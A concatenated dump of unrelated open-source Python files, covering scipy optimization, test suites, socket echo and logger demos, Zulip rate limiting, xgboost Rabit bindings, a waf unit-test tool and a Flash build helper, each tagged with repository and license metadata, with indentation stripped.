_check_unknown_options(unknown_options)
maxfun = maxiter
rhoend = tol
if not disp:
iprint = 0
# check constraints
if isinstance(constraints, dict):
constraints = (constraints, )
for ic, con in enumerate(constraints):
# check type
try:
ctype = con['type'].lower()
except KeyError:
raise KeyError('Constraint %d has no type defined.' % ic)
except TypeError:
raise TypeError('Constraints must be defined using a '
'dictionary.')
except AttributeError:
raise TypeError("Constraint's type must be a string.")
else:
if ctype != 'ineq':
raise ValueError("Constraints of type '%s' not handled by "
"COBYLA." % con['type'])
# check function
if 'fun' not in con:
raise KeyError('Constraint %d has no function defined.' % ic)
# check extra arguments
if 'args' not in con:
con['args'] = ()
m = len(constraints)
def calcfc(x, con):
f = fun(x, *args)
for k, c in enumerate(constraints):
con[k] = c['fun'](x, *c['args'])
return f
info = np.zeros(4, np.float64)
xopt, info = _cobyla.minimize(calcfc, m=m, x=np.copy(x0), rhobeg=rhobeg,
rhoend=rhoend, iprint=iprint, maxfun=maxfun,
dinfo=info)
return Result(x=xopt,
status=int(info[0]),
success=info[0]==1,
message={1: 'Optimization terminated successfully.',
2: 'Maximum number of function evaluations has '
'been exceeded.',
3: 'Rounding errors are becoming damaging in '
'COBYLA subroutine.'
}.get(info[0], 'Unknown exit status.'),
nfev=int(info[1]),
fun=info[2],
maxcv=info[3])
if __name__ == '__main__':
from math import sqrt
def fun(x):
return x[0] * x[1]
def cons(x):
return 1 - x[0]**2 - x[1]**2
x = fmin_cobyla(fun, [1., 1.], cons, iprint = 3, disp = 1)
print('\nTheoretical solution: %e, %e' % (1. / sqrt(2.), -1. / sqrt(2.)))
| Universal-Model-Converter/UMC3.0a | data/Python/x86/Lib/site-packages/scipy/optimize/cobyla.py | Python | mit | 8,871 |
##########################################################################
#
# Copyright (c) 2013-2014, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import Gaffer
import GafferUI
import GafferScene
Gaffer.Metadata.registerNodeDescription(
GafferScene.Transform,
"""Modifies the transforms of all locations matched by the filter.""",
"space",
"""The space in which the transform is applied.""",
"transform",
"""The transform to be applied.""",
)
GafferUI.PlugValueWidget.registerCreator(
GafferScene.Transform,
"space",
GafferUI.EnumPlugValueWidget,
labelsAndValues = (
( "World", GafferScene.Transform.Space.World ),
( "Object", GafferScene.Transform.Space.Object ),
)
)
| goddardl/gaffer | python/GafferSceneUI/TransformUI.py | Python | bsd-3-clause | 2,347 |
"""Tests for the management commands `send_message_digest`."""
from django.core import mail
from django.core.management import call_command
from django.test import TestCase
from django.utils.timezone import now, timedelta
from mixer.backend.django import mixer
class SendMessageDigestTestCase(TestCase):
longMessage = True
def test_validates_and_saves_input(self):
two_days_ago = now() - timedelta(days=2)
user = mixer.blend('auth.User')
conversation = mixer.blend('conversation.Conversation')
conversation.users.add(user)
conversation.unread_by.add(user)
call_command('send_message_digest')
self.assertEqual(len(mail.outbox), 0, msg=(
'No digest should have been sent.'))
conversation.read_by_all = two_days_ago
conversation.save()
call_command('send_message_digest')
self.assertEqual(len(mail.outbox), 1, msg=(
'One digest should have been sent.'))
with self.settings(CONVERSATION_ENABLE_DIGEST=False):
call_command('send_message_digest')
self.assertEqual(len(mail.outbox), 1, msg=(
'No new digest should have been sent.'))
| bitmazk/django-conversation | conversation/tests/management_tests.py | Python | mit | 1,199 |
# Copyright (c) 2015 Lars Hupfeldt Nielsen, Hupfeldt IT
# All rights reserved. This work is under a BSD license, see LICENSE.TXT.
import os, multiprocessing
import time
import bottle
import requests
import pytest
from pytest import raises
from jenkinsflow import jenkins_api
from .cfg import ApiType
from .framework import api_select
from .framework.utils import assert_lines_in
here = os.path.abspath(os.path.dirname(__file__))
@bottle.route('/')
def _index():
return bottle.static_file('which_ci_server.html', root=here)
@bottle.route('/api/json')
def _api():
return bottle.static_file('which_ci_server.html', root=here)
_host = 'localhost'
_port = 8082
def _server():
bottle.run(host=_host, port=_port, debug=True)
@pytest.mark.apis(ApiType.JENKINS)
def test_which_ci_server_not_ci(api_type):
proc = None
try:
with api_select.api(__file__, api_type) as api:
proc = multiprocessing.Process(target=_server)
proc.start()
with raises(Exception) as exinfo:
for _ in range(0, 10):
ex = None
try:
jenkins_api.Jenkins("http://" + _host + ':' + repr(_port), "dummy").poll()
except requests.exceptions.ConnectionError as ex:
# Wait for bottle to start
print(ex)
time.sleep(0.1)
assert_lines_in(
api_type, str(exinfo.value),
"Not connected to Jenkins or Hudson (expected X-Jenkins or X-Hudson header, got: "
)
finally:
if proc:
proc.terminate()
| lechat/jenkinsflow | test/which_ci_server_test.py | Python | bsd-3-clause | 1,672 |
import os
import socket
import threading
import socketserver
SERVER_HOST = 'localhost'
SERVER_PORT = 0 # Tells kernel to pick port randomly
BUF_SIZE = 1024
ECHO_MSG = b'Hello echo Server!'
class ForkedClient():
def __init__(self, ip, port):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((ip, port))
def run(self):
current_process_id = os.getpid()
print('PID %s. Sending message: %s' % (current_process_id, ECHO_MSG))
sent_data_length = self.socket.send(ECHO_MSG)
print("Sent: %d characters" % sent_data_length)
response = self.socket.recv(BUF_SIZE)
print("PID %s recieved %s" % (current_process_id, response))
def shutdown(self):
self.socket.close()
class ForkingServerRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request.recv(BUF_SIZE)
current_process_id = os.getpid()
response = "%s: %s" % (current_process_id, data)
response = bytes(response, 'utf-8')
print("Server sending response [pid: data]: %s" % response)
self.request.send(response)
return
class ForkingServer(socketserver.ForkingMixIn, socketserver.TCPServer):
""" Nothing to add here. Inhereted everything """
pass
def main():
# Launch the server
server = ForkingServer((SERVER_HOST, SERVER_PORT), ForkingServerRequestHandler)
ip, port = server.server_address # Getting the port number
server_thread = threading.Thread(target=server.serve_forever)
server_thread.setDaemon(True)
server_thread.start()
print('Server loop running PID: %s' % os.getpid())
# Launch the client
client1 = ForkedClient(ip, port)
client1.run()
client2 = ForkedClient(ip, port)
client2.run()
# Clean them up
server.shutdown()
client1.shutdown()
client2.shutdown()
server.socket.close()
if __name__ == '__main__':
main()
| GreenJoey/My-Simple-Programs | python/Network Programming/echo_server.py | Python | gpl-2.0 | 1,974 |
from argparse import ArgumentParser
from typing import Any
from zerver.lib.management import CommandError, ZulipBaseCommand
from zerver.lib.rate_limiter import RateLimitedUser
from zerver.models import UserProfile, get_user_profile_by_api_key
class Command(ZulipBaseCommand):
help = """Manually block or unblock a user from accessing the API"""
def add_arguments(self, parser: ArgumentParser) -> None:
parser.add_argument('-e', '--email',
dest='email',
help="Email account of user.")
parser.add_argument('-a', '--api-key',
dest='api_key',
help="API key of user.")
parser.add_argument('-s', '--seconds',
dest='seconds',
default=60,
type=int,
help="Seconds to block for.")
parser.add_argument('-d', '--domain',
dest='domain',
default='api_by_user',
help="Rate-limiting domain. Defaults to 'api_by_user'.")
parser.add_argument('-b', '--all-bots',
dest='bots',
action='store_true',
default=False,
help="Whether or not to also block all bots for this user.")
parser.add_argument('operation', metavar='<operation>', type=str, choices=['block', 'unblock'],
help="operation to perform (block or unblock)")
self.add_realm_args(parser)
def handle(self, *args: Any, **options: Any) -> None:
if (not options['api_key'] and not options['email']) or \
(options['api_key'] and options['email']):
raise CommandError("Please enter either an email or API key to manage")
realm = self.get_realm(options)
if options['email']:
user_profile = self.get_user(options['email'], realm)
else:
try:
user_profile = get_user_profile_by_api_key(options['api_key'])
except UserProfile.DoesNotExist:
raise CommandError("Unable to get user profile for api key {}".format(options['api_key']))
users = [user_profile]
if options['bots']:
users.extend(bot for bot in UserProfile.objects.filter(is_bot=True,
bot_owner=user_profile))
operation = options['operation']
for user in users:
print(f"Applying operation to User ID: {user.id}: {operation}")
if operation == 'block':
RateLimitedUser(user, domain=options['domain']).block_access(options['seconds'])
elif operation == 'unblock':
RateLimitedUser(user, domain=options['domain']).unblock_access()
| brainwane/zulip | zerver/management/commands/rate_limit.py | Python | apache-2.0 | 2,937 |
"""Distributed XGBoost Rabit related API."""
import ctypes
from enum import IntEnum, unique
import pickle
from typing import Any, TypeVar, Callable, Optional, cast, List, Union
import numpy as np
from .core import _LIB, c_str, STRING_TYPES, _check_call
def _init_rabit() -> None:
"""internal library initializer."""
if _LIB is not None:
_LIB.RabitGetRank.restype = ctypes.c_int
_LIB.RabitGetWorldSize.restype = ctypes.c_int
_LIB.RabitIsDistributed.restype = ctypes.c_int
_LIB.RabitVersionNumber.restype = ctypes.c_int
def init(args: Optional[List[bytes]] = None) -> None:
"""Initialize the rabit library with arguments"""
if args is None:
args = []
arr = (ctypes.c_char_p * len(args))()
arr[:] = cast(List[Union[ctypes.c_char_p, bytes, None, int]], args)
_LIB.RabitInit(len(arr), arr)
def finalize() -> None:
"""Finalize the process, notify tracker everything is done."""
_LIB.RabitFinalize()
def get_rank() -> int:
"""Get rank of current process.
Returns
-------
rank : int
Rank of current process.
"""
ret = _LIB.RabitGetRank()
return ret
def get_world_size() -> int:
"""Get total number workers.
Returns
-------
n : int
Total number of process.
"""
ret = _LIB.RabitGetWorldSize()
return ret
def is_distributed() -> int:
'''If rabit is distributed.'''
is_dist = _LIB.RabitIsDistributed()
return is_dist
def tracker_print(msg: Any) -> None:
"""Print message to the tracker.
This function can be used to communicate the information of
the progress to the tracker
Parameters
----------
msg : str
The message to be printed to tracker.
"""
if not isinstance(msg, STRING_TYPES):
msg = str(msg)
is_dist = _LIB.RabitIsDistributed()
if is_dist != 0:
_check_call(_LIB.RabitTrackerPrint(c_str(msg)))
else:
print(msg.strip(), flush=True)
def get_processor_name() -> bytes:
"""Get the processor name.
Returns
-------
name : str
the name of processor(host)
"""
mxlen = 256
length = ctypes.c_ulong()
buf = ctypes.create_string_buffer(mxlen)
_LIB.RabitGetProcessorName(buf, ctypes.byref(length), mxlen)
return buf.value
T = TypeVar("T") # pylint:disable=invalid-name
def broadcast(data: T, root: int) -> T:
"""Broadcast object from one node to all other nodes.
Parameters
----------
data : any type that can be pickled
Input data, if current rank does not equal root, this can be None
root : int
Rank of the node to broadcast data from.
Returns
-------
object : int
the result of broadcast.
"""
rank = get_rank()
length = ctypes.c_ulong()
if root == rank:
assert data is not None, 'need to pass in data when broadcasting'
s = pickle.dumps(data, protocol=pickle.HIGHEST_PROTOCOL)
length.value = len(s)
# run first broadcast
_check_call(_LIB.RabitBroadcast(ctypes.byref(length),
ctypes.sizeof(ctypes.c_ulong), root))
if root != rank:
dptr = (ctypes.c_char * length.value)()
# run second
_check_call(_LIB.RabitBroadcast(ctypes.cast(dptr, ctypes.c_void_p),
length.value, root))
data = pickle.loads(dptr.raw)
del dptr
else:
_check_call(_LIB.RabitBroadcast(ctypes.cast(ctypes.c_char_p(s), ctypes.c_void_p),
length.value, root))
del s
return data
# enumeration of dtypes
DTYPE_ENUM__ = {
np.dtype('int8'): 0,
np.dtype('uint8'): 1,
np.dtype('int32'): 2,
np.dtype('uint32'): 3,
np.dtype('int64'): 4,
np.dtype('uint64'): 5,
np.dtype('float32'): 6,
np.dtype('float64'): 7
}
@unique
class Op(IntEnum):
'''Supported operations for rabit.'''
MAX = 0
MIN = 1
SUM = 2
OR = 3
def allreduce( # pylint:disable=invalid-name
data: np.ndarray, op: Op, prepare_fun: Optional[Callable[[np.ndarray], None]] = None
) -> np.ndarray:
"""Perform allreduce, return the result.
Parameters
----------
data :
Input data.
op :
Reduction operators, can be MIN, MAX, SUM, BITOR
prepare_fun :
Lazy preprocessing function, if it is not None, prepare_fun(data)
will be called by the function before performing allreduce, to initialize the data
If the result of Allreduce can be recovered directly,
then prepare_fun will NOT be called
Returns
-------
result :
The result of allreduce, have same shape as data
Notes
-----
This function is not thread-safe.
"""
if not isinstance(data, np.ndarray):
raise Exception('allreduce only takes in numpy.ndarray')
buf = data.ravel()
if buf.base is data.base:
buf = buf.copy()
if buf.dtype not in DTYPE_ENUM__:
raise Exception(f"data type {buf.dtype} not supported")
if prepare_fun is None:
_check_call(_LIB.RabitAllreduce(buf.ctypes.data_as(ctypes.c_void_p),
buf.size, DTYPE_ENUM__[buf.dtype],
int(op), None, None))
else:
func_ptr = ctypes.CFUNCTYPE(None, ctypes.c_void_p)
def pfunc(_: Any) -> None:
"""prepare function."""
fn = cast(Callable[[np.ndarray], None], prepare_fun)
fn(data)
_check_call(_LIB.RabitAllreduce(buf.ctypes.data_as(ctypes.c_void_p),
buf.size, DTYPE_ENUM__[buf.dtype],
op, func_ptr(pfunc), None))
return buf
def version_number() -> int:
"""Returns version number of current stored model.
This means how many calls to CheckPoint we made so far.
Returns
-------
version : int
Version number of currently stored model
"""
ret = _LIB.RabitVersionNumber()
return ret
# initialization script
_init_rabit()
| dmlc/xgboost | python-package/xgboost/rabit.py | Python | apache-2.0 | 6,139 |
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2015-2018 CERN.
#
# Invenio is free software; you can redistribute it and/or modify it
# under the terms of the MIT License; see LICENSE file for more details.
"""Get record tests."""
from __future__ import absolute_import, print_function
from flask import url_for
from helpers import get_json, record_url, to_relative_url
def test_item_get(app, test_records):
"""Test record retrieval."""
with app.test_client() as client:
pid, record = test_records[0]
res = client.get(record_url(pid))
assert res.status_code == 200
assert res.cache_control.no_cache
assert res.headers['ETag'] == '"{}"'.format(record.revision_id)
# Check metadata
data = get_json(res)
for k in ['id', 'created', 'updated', 'metadata', 'links']:
assert k in data
assert data['id'] == pid.pid_value
assert data['metadata'] == record.dumps()
# Check self links
client.get(to_relative_url(data['links']['self']))
assert res.status_code == 200
assert data == get_json(res)
def test_item_get_etag(app, test_records):
"""Test VALID record get request (GET .../records/<record_id>)."""
with app.test_client() as client:
pid, record = test_records[0]
res = client.get(record_url(pid))
assert res.status_code == 200
assert res.cache_control.no_cache
etag = res.headers['ETag']
last_modified = res.headers['Last-Modified']
# Test request via etag
res = client.get(record_url(pid), headers={'If-None-Match': etag})
assert res.status_code == 304
assert res.cache_control.no_cache
# Test request via last-modified.
res = client.get(
record_url(pid), headers={'If-Modified-Since': last_modified})
assert res.status_code == 304
assert res.cache_control.no_cache
def test_item_get_norecord(app, test_records):
"""Test INVALID record get request (GET .../records/<record_id>)."""
with app.test_client() as client:
# check that GET with non existing id will return 404
res = client.get(url_for(
'invenio_records_rest.recid_item', pid_value='0'),
)
assert res.status_code == 404
def test_item_get_invalid_mimetype(app, test_records):
"""Test invalid mimetype returns 406."""
with app.test_client() as client:
pid, record = test_records[0]
# Check that GET with non accepted format will return 406
res = client.get(record_url(pid), headers=[('Accept', 'video/mp4')])
assert res.status_code == 406
| inveniosoftware/invenio-records-rest | tests/test_views_item_get.py | Python | mit | 2,695 |
import unittest
import numpy as np
from waLBerla import field, createUniformBlockGrid, AABB
class BlockforestModuleTest(unittest.TestCase):
def testMemoryManagement1(self):
"""Testing correct reference counting of block data"""
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
field.addToStorage(blocks, "TestField", np.float64)
f = blocks[0]["TestField"]
strides_before = f.strides
del blocks
# create another block structure - this has triggered segfault
# when previous blockstructure was already freed
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2)) # noqa: F841
# The first block structure must exist here, since we hold a reference to block data
# if it would have been deleted already f.strides should lead to segfault or invalid values
self.assertEqual(strides_before, f.strides)
def testMemoryManagement2(self):
"""Testing correct reference counting of block data
Holding only a numpy array pointing to a waLBerla field should still hold the blockstructure alive"""
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
field.addToStorage(blocks, "TestField", np.float64)
npf = field.toArray(blocks[0]["TestField"])
npf[:, :, :] = 42.0
del blocks
# create another block structure - this has triggered segfault
# when previous blockstructure was already freed
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2)) # noqa: F841
self.assertEqual(npf[0, 0, 0], 42.0)
def testMemoryManagement3(self):
"""Same as testMemoryManagement2, but with iterators"""
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
field.addToStorage(blocks, "TestField", np.float64)
for block in blocks:
for name in block.fieldNames:
if name == "TestField":
f = block[name]
npf = field.toArray(f)
npf[:, :, :] = 42.0
del blocks, block, name, f
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2)) # noqa: F841
self.assertEqual(npf[0, 0, 0], 42.0)
def testExceptions(self):
"""Check that the right exceptions are thrown when nonexistent or non-convertible fields are accessed"""
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
with self.assertRaises(ValueError) as cm:
blocks[0]["cell bounding box"]
self.assertEqual(str(cm.exception), "This blockdata is not accessible from Python")
with self.assertRaises(IndexError) as cm:
blocks[0]["nonexistent"]
self.assertEqual(str(cm.exception), "No blockdata with the given name found")
def testGeneralFunctionality(self):
blocks = createUniformBlockGrid(blocks=(1, 1, 1), cellsPerBlock=(2, 2, 2))
self.assertEqual(blocks.getNumberOfLevels(), 1)
aabb = blocks.getDomain
aabb2 = AABB(1.0, 1.0, 1.0, 1.2, 1.2, 1.2)
self.assertEqual(aabb.min, (0.0, 0.0, 0.0))
self.assertEqual(aabb.max, (2.0, 2.0, 2.0))
self.assertEqual(aabb.size, (2.0, 2.0, 2.0))
self.assertEqual(aabb.empty, False)
self.assertEqual(aabb.volume, 8.0)
self.assertEqual(aabb.center, (1.0, 1.0, 1.0))
self.assertEqual(aabb.contains(aabb2), True)
self.assertEqual(aabb2.contains(aabb), False)
self.assertEqual(aabb2.contains((1.2, 1.2, 1.2)), False)
self.assertEqual(aabb2.contains((1.1, 1.1, 1.1)), True)
if __name__ == '__main__':
unittest.main()
| lssfau/walberla | python/waLBerla_tests/test_blockforest.py | Python | gpl-3.0 | 3,743 |
#!/usr/bin/env python
import SocketServer
import time
import sys
class LoggerRequestHandler(SocketServer.BaseRequestHandler):
def setup(self):
print self.client_address, 'connected!'
def handle(self):
while 1:
time.sleep(0.01)
data = self.request.recv(1024)
if len(data) > 0:
sys.stdout.write(data)
def finish(self):
print self.client_address, 'disconnected!'
if __name__=='__main__':
SocketServer.ThreadingTCPServer.allow_reuse_address = True
server = SocketServer.ThreadingTCPServer(('', 4444), LoggerRequestHandler)
server.serve_forever()
| avroshk/VRDAW | VRDAW_working/LogServer.py | Python | gpl-3.0 | 648 |
#!/usr/bin/env python
# encoding: utf-8
# Carlos Rafael Giani, 2006
"""
Unit tests run in the shutdown() method, and for c/c++ programs
One should NOT have to give parameters to programs to execute
In the shutdown method, add the following code:
>>> def shutdown():
... ut = UnitTest.unit_test()
... ut.run()
... ut.print_results()
Each object to use as a unit test must be a program and must have X{obj.unit_test=1}
"""
import os, sys
import Build, TaskGen, Utils, Options, Logs, Task
from TaskGen import before, after, feature
from Constants import *
class unit_test(object):
"Unit test representation"
def __init__(self):
self.returncode_ok = 0 # Unit test returncode considered OK. All returncodes differing from this one
# will cause the unit test to be marked as "FAILED".
# The following variables are filled with data by run().
# print_results() uses these for printing the unit test summary,
# but if there is need for direct access to the results,
# they can be retrieved here, after calling run().
self.num_tests_ok = 0 # Number of successful unit tests
self.num_tests_failed = 0 # Number of failed unit tests
self.num_tests_err = 0 # Tests that have not even run
self.total_num_tests = 0 # Total amount of unit tests
self.max_label_length = 0 # Maximum label length (pretty-print the output)
self.unit_tests = Utils.ordered_dict() # Unit test dictionary. Key: the label (unit test filename relative
# to the build dir), value: unit test filename with absolute path
self.unit_test_results = {} # Dictionary containing the unit test results.
# Key: the label, value: result (true = success false = failure)
self.unit_test_erroneous = {} # Dictionary indicating erroneous unit tests.
# Key: the label, value: true = unit test has an error false = unit test is ok
self.change_to_testfile_dir = False #True if the test file needs to be executed from the same dir
self.want_to_see_test_output = False #True to see the stdout from the testfile (for example check suites)
self.want_to_see_test_error = False #True to see the stderr from the testfile (for example check suites)
self.run_if_waf_does = 'check' #build was the old default
def run(self):
"Run the unit tests and gather results (note: no output here)"
self.num_tests_ok = 0
self.num_tests_failed = 0
self.num_tests_err = 0
self.total_num_tests = 0
self.max_label_length = 0
self.unit_tests = Utils.ordered_dict()
self.unit_test_results = {}
self.unit_test_erroneous = {}
ld_library_path = []
# If waf is not building, don't run anything
if not Options.commands[self.run_if_waf_does]: return
# Get the paths for the shared libraries, and obtain the unit tests to execute
for obj in Build.bld.all_task_gen:
try:
link_task = obj.link_task
except AttributeError:
pass
else:
lib_path = link_task.outputs[0].parent.abspath(obj.env)
if lib_path not in ld_library_path:
ld_library_path.append(lib_path)
unit_test = getattr(obj, 'unit_test', '')
if unit_test and 'cprogram' in obj.features:
try:
output = obj.path
filename = os.path.join(output.abspath(obj.env), obj.target)
srcdir = output.abspath()
label = os.path.join(output.bldpath(obj.env), obj.target)
self.max_label_length = max(self.max_label_length, len(label))
self.unit_tests[label] = (filename, srcdir)
except KeyError:
pass
self.total_num_tests = len(self.unit_tests)
# Now run the unit tests
Utils.pprint('GREEN', 'Running the unit tests')
count = 0
result = 1
for label in self.unit_tests.allkeys:
file_and_src = self.unit_tests[label]
filename = file_and_src[0]
srcdir = file_and_src[1]
count += 1
line = Build.bld.progress_line(count, self.total_num_tests, Logs.colors.GREEN, Logs.colors.NORMAL)
if Options.options.progress_bar and line:
sys.stderr.write(line)
sys.stderr.flush()
try:
kwargs = {}
kwargs['env'] = os.environ.copy()
if self.change_to_testfile_dir:
kwargs['cwd'] = srcdir
if not self.want_to_see_test_output:
kwargs['stdout'] = Utils.pproc.PIPE # PIPE for ignoring output
if not self.want_to_see_test_error:
kwargs['stderr'] = Utils.pproc.PIPE # PIPE for ignoring output
if ld_library_path:
v = kwargs['env']
def add_path(dct, path, var):
dct[var] = os.pathsep.join(Utils.to_list(path) + [os.environ.get(var, '')])
if sys.platform == 'win32':
add_path(v, ld_library_path, 'PATH')
elif sys.platform == 'darwin':
add_path(v, ld_library_path, 'DYLD_LIBRARY_PATH')
add_path(v, ld_library_path, 'LD_LIBRARY_PATH')
else:
add_path(v, ld_library_path, 'LD_LIBRARY_PATH')
pp = Utils.pproc.Popen(filename, **kwargs)
pp.wait()
result = int(pp.returncode == self.returncode_ok)
if result:
self.num_tests_ok += 1
else:
self.num_tests_failed += 1
self.unit_test_results[label] = result
self.unit_test_erroneous[label] = 0
except OSError:
self.unit_test_erroneous[label] = 1
self.num_tests_err += 1
except KeyboardInterrupt:
pass
if Options.options.progress_bar: sys.stdout.write(Logs.colors.cursor_on)
def print_results(self):
"Pretty-prints a summary of all unit tests, along with some statistics"
# If waf is not building, don't output anything
if not Options.commands[self.run_if_waf_does]: return
p = Utils.pprint
# Early quit if no tests were performed
if self.total_num_tests == 0:
p('YELLOW', 'No unit tests present')
return
for label in self.unit_tests.allkeys:
filename = self.unit_tests[label]
err = 0
result = 0
try: err = self.unit_test_erroneous[label]
except KeyError: pass
try: result = self.unit_test_results[label]
except KeyError: pass
n = self.max_label_length - len(label)
if err: n += 4
elif result: n += 7
else: n += 3
line = '%s %s' % (label, '.' * n)
if err: p('RED', '%sERROR' % line)
elif result: p('GREEN', '%sOK' % line)
else: p('YELLOW', '%sFAILED' % line)
percentage_ok = float(self.num_tests_ok) / float(self.total_num_tests) * 100.0
percentage_failed = float(self.num_tests_failed) / float(self.total_num_tests) * 100.0
percentage_erroneous = float(self.num_tests_err) / float(self.total_num_tests) * 100.0
p('NORMAL', '''
Successful tests: %i (%.1f%%)
Failed tests: %i (%.1f%%)
Erroneous tests: %i (%.1f%%)
Total number of tests: %i
''' % (self.num_tests_ok, percentage_ok, self.num_tests_failed, percentage_failed,
self.num_tests_err, percentage_erroneous, self.total_num_tests))
p('GREEN', 'Unit tests finished')
############################################################################################
"""
New unit test system
The targets with feature 'test' are executed after they are built
bld(features='cprogram cc test', ...)
To display the results:
import UnitTest
bld.add_post_fun(UnitTest.summary)
"""
import threading
testlock = threading.Lock()
@feature('test')
@after('apply_link', 'vars_target_cprogram')
def make_test(self):
if not 'cprogram' in self.features:
Logs.error('test cannot be executed %s' % self)
return
self.default_install_path = None
tsk = self.create_task('utest')
tsk.set_inputs(self.link_task.outputs)
def exec_test(self):
testlock.acquire()
fail = False
try:
filename = self.inputs[0].abspath(self.env)
try:
fu = getattr(self.generator.bld, 'all_test_paths')
except AttributeError:
fu = os.environ.copy()
self.generator.bld.all_test_paths = fu
lst = []
for obj in self.generator.bld.all_task_gen:
link_task = getattr(obj, 'link_task', None)
if link_task:
lst.append(link_task.outputs[0].parent.abspath(obj.env))
def add_path(dct, path, var):
dct[var] = os.pathsep.join(Utils.to_list(path) + [os.environ.get(var, '')])
if sys.platform == 'win32':
add_path(fu, lst, 'PATH')
elif sys.platform == 'darwin':
add_path(fu, lst, 'DYLD_LIBRARY_PATH')
add_path(fu, lst, 'LD_LIBRARY_PATH')
else:
add_path(fu, lst, 'LD_LIBRARY_PATH')
try:
ret = Utils.cmd_output(filename, cwd=self.inputs[0].parent.abspath(self.env), env=fu)
except Exception, e:
fail = True
ret = '' + str(e)
else:
pass
stats = getattr(self.generator.bld, 'utest_results', [])
stats.append((filename, fail, ret))
self.generator.bld.utest_results = stats
finally:
testlock.release()
cls = Task.task_type_from_func('utest', func=exec_test, color='RED', ext_in='.bin')
old = cls.runnable_status
def test_status(self):
if getattr(Options.options, 'all_tests', False):
return RUN_ME
return old(self)
cls.runnable_status = test_status
cls.quiet = 1
def summary(bld):
lst = getattr(bld, 'utest_results', [])
if lst:
Utils.pprint('CYAN', 'execution summary')
for (f, fail, ret) in lst:
col = fail and 'RED' or 'GREEN'
Utils.pprint(col, (fail and 'FAIL' or 'ok') + " " + f)
if fail: Utils.pprint('NORMAL', ret.replace('\\n', '\n'))
def set_options(opt):
opt.add_option('--alltests', action='store_true', default=False, help='Exec all unit tests', dest='all_tests')
| jubos/meguro | tools/wafadmin/Tools/UnitTest.py | Python | mit | 9,155 |
# oracle/__init__.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from sqlalchemy.dialects.oracle import base, cx_oracle, zxjdbc
base.dialect = cx_oracle.dialect
from sqlalchemy.dialects.oracle.base import \
VARCHAR, NVARCHAR, CHAR, DATE, DATETIME, NUMBER,\
BLOB, BFILE, CLOB, NCLOB, TIMESTAMP, RAW,\
FLOAT, DOUBLE_PRECISION, LONG, dialect, INTERVAL,\
VARCHAR2, NVARCHAR2
__all__ = (
'VARCHAR', 'NVARCHAR', 'CHAR', 'DATE', 'DATETIME', 'NUMBER',
'BLOB', 'BFILE', 'CLOB', 'NCLOB', 'TIMESTAMP', 'RAW',
'FLOAT', 'DOUBLE_PRECISION', 'LONG', 'dialect', 'INTERVAL',
'VARCHAR2', 'NVARCHAR2', 'ROWID'
)
| eunchong/build | third_party/sqlalchemy_0_7_1/sqlalchemy/dialects/oracle/__init__.py | Python | bsd-3-clause | 785 |
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__ = ['FlashBuilder']
import os, sys, urllib, xmlrpclib
from xml.dom.minidom import parseString
from pyasm.application.common import SessionBuilder
from flash_environment import FlashEnvironment
from flash_info import FlashInfo
from flash import Flash
class FlashBuilder(SessionBuilder):
'''builds a flash file'''
def __init__(self):
super(FlashBuilder,self).__init__()
self.info = FlashInfo.get()
self.is_initialized = False
def init(self):
jsfl_list = []
if self.is_initialized:
return jsfl_list
# instantiate the session
#server = self.env.get_server_url()
server = "http://fugu"
self.info.download("%s/context/JSFL/common.jsfl" % server)
self.load_jsfl = self.info.download("%s/context/JSFL/load2.jsfl" % server)
self.publish_jsfl = self.info.download("%s/context/JSFL/publish2.jsfl" % server)
self.render_jsfl = self.info.download("%s/context/JSFL/render.jsfl" % server)
#self.sandbox_path = "C:/sthpw/sandbox"
#self.log_path = "C:/sthpw/temp/actionLog.txt"
self.sandbox_path = self.info.get_sandbox_dir()
self.log_path = self.info.get_log_path()
self.publish_dir = self.info.get_publish_dir()
# load the appropriate jsfl files
jsfl = self.app.get_jsfl(self.load_jsfl, "include", "common.jsfl", self.info.get_tmp_dir())
